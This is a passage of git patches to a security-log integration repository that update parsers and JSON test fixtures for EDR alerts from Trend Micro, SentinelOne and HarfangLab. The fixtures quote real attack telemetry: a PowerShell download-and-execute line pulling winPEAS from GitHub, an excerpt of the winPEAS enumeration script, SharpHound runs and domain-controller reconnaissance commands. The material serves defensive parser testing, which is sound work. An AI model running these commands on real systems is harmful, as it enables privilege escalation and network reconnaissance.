\"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file From b0a30f3d53175743ba460104746263e2d78444db Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Thu, 28 Nov 2024 15:28:49 +0200 Subject: [PATCH 104/150] Fix review comments --- SentinelOne/identity/ingest/parser.yml | 10 +++++----- SentinelOne/identity/tests/test_alert_1.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_11.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_12.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_13.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_14.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_15.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_16.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_5.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_6.json | 14 ++++++-------- SentinelOne/identity/tests/test_alert_7.json | 14 ++++++-------- 11 files changed, 65 insertions(+), 85 deletions(-) diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml index 79cd3ec9f..90577404d 100644 --- a/SentinelOne/identity/ingest/parser.yml +++ b/SentinelOne/identity/ingest/parser.yml @@ -51,11 +51,11 @@ stages: process.command_line: "{{json_event.message.process.cmdLine}}" process.parent.name: "{{json_event.message.process.parentName}}" - file.path: "{{json_event.message.process.file.path}}" - file.name: "{{json_event.message.process.file.path | basename}}" - file.hash.sha1: "{{json_event.message.process.file.sha1}}" - file.hash.sha256: "{{json_event.message.process.file.sha256}}" - file.hash.md5: "{{json_event.message.process.file.md5}}" + process.executable: "{{json_event.message.process.file.path}}" + process.name: "{{json_event.message.process.file.path | basename}}" + process.hash.sha1: "{{json_event.message.process.file.sha1}}" + process.hash.sha256: "{{json_event.message.process.file.sha256}}" + process.hash.md5: "{{json_event.message.process.file.md5}}" sentinelone.identity.id: "{{json_event.message.id}}" sentinelone.identity.name: "{{json_event.message.name}}" diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json index 1e8b5bf2b..8d5dcf96a 100644 --- a/SentinelOne/identity/tests/test_alert_1.json +++ b/SentinelOne/identity/tests/test_alert_1.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T05:35:09Z", - "file": { - "hash": { - "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" - }, - "name": "net1.exe", - "path": "c:\\windows\\system32\\net1.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain" + "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain", + "executable": "c:\\windows\\system32\\net1.exe", + "hash": { + "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + }, + "name": "net1.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json index a4d81025f..84d64cee6 100644 --- a/SentinelOne/identity/tests/test_alert_11.json +++ b/SentinelOne/identity/tests/test_alert_11.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json index 1618da843..3e75c9e78 100644 --- a/SentinelOne/identity/tests/test_alert_12.json +++ b/SentinelOne/identity/tests/test_alert_12.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json index a31ef954f..d94a9c18b 100644 --- a/SentinelOne/identity/tests/test_alert_13.json +++ b/SentinelOne/identity/tests/test_alert_13.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json index 7b9fc10e1..f8a4295bb 100644 --- a/SentinelOne/identity/tests/test_alert_14.json +++ b/SentinelOne/identity/tests/test_alert_14.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json index d8a7c1f8a..3d07d62a5 100644 --- a/SentinelOne/identity/tests/test_alert_15.json +++ b/SentinelOne/identity/tests/test_alert_15.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json index 8a5217a55..0a9dc292d 100644 --- a/SentinelOne/identity/tests/test_alert_16.json +++ b/SentinelOne/identity/tests/test_alert_16.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T08:45:50Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json index f1339df60..6e14dbe24 100644 --- a/SentinelOne/identity/tests/test_alert_5.json +++ b/SentinelOne/identity/tests/test_alert_5.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T09:54:58Z", - "file": { - "hash": { - "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" - }, - "name": "cmd.exe", - "path": "c:\\windows\\system32\\cmd.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "\"C:\\Windows\\system32\\cmd.exe\"" + "command_line": "\"C:\\Windows\\system32\\cmd.exe\"", + "executable": "c:\\windows\\system32\\cmd.exe", + "hash": { + "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + }, + "name": "cmd.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json index e43c64e20..5b987ddc2 100644 --- a/SentinelOne/identity/tests/test_alert_6.json +++ b/SentinelOne/identity/tests/test_alert_6.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T09:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json index d4acce26a..6fc5195cb 100644 --- a/SentinelOne/identity/tests/test_alert_7.json +++ b/SentinelOne/identity/tests/test_alert_7.json @@ -14,19 +14,17 @@ "type": "info" }, "@timestamp": "2024-11-22T09:45:51Z", - "file": { - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe", - "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" - }, "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, "process": { - "command_line": "Sharphound.exe" + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" }, "related": { "hash": [ From e88ee2f227504e1d060cad7568d9bf5a58b31b6c Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 16:56:30 +0100 Subject: [PATCH 105/150] fix/Harfanglab --- HarfangLab/harfanglab/ingest/parser.yml | 225 ++++++++++++++++++++++- HarfangLab/harfanglab/tests/alert_4.json | 112 +++++++++++ HarfangLab/harfanglab/tests/alert_5.json | 88 +++++++++ 3 files changed, 424 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/alert_4.json create mode 100644 HarfangLab/harfanglab/tests/alert_5.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 1376e0758..93671efde 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch 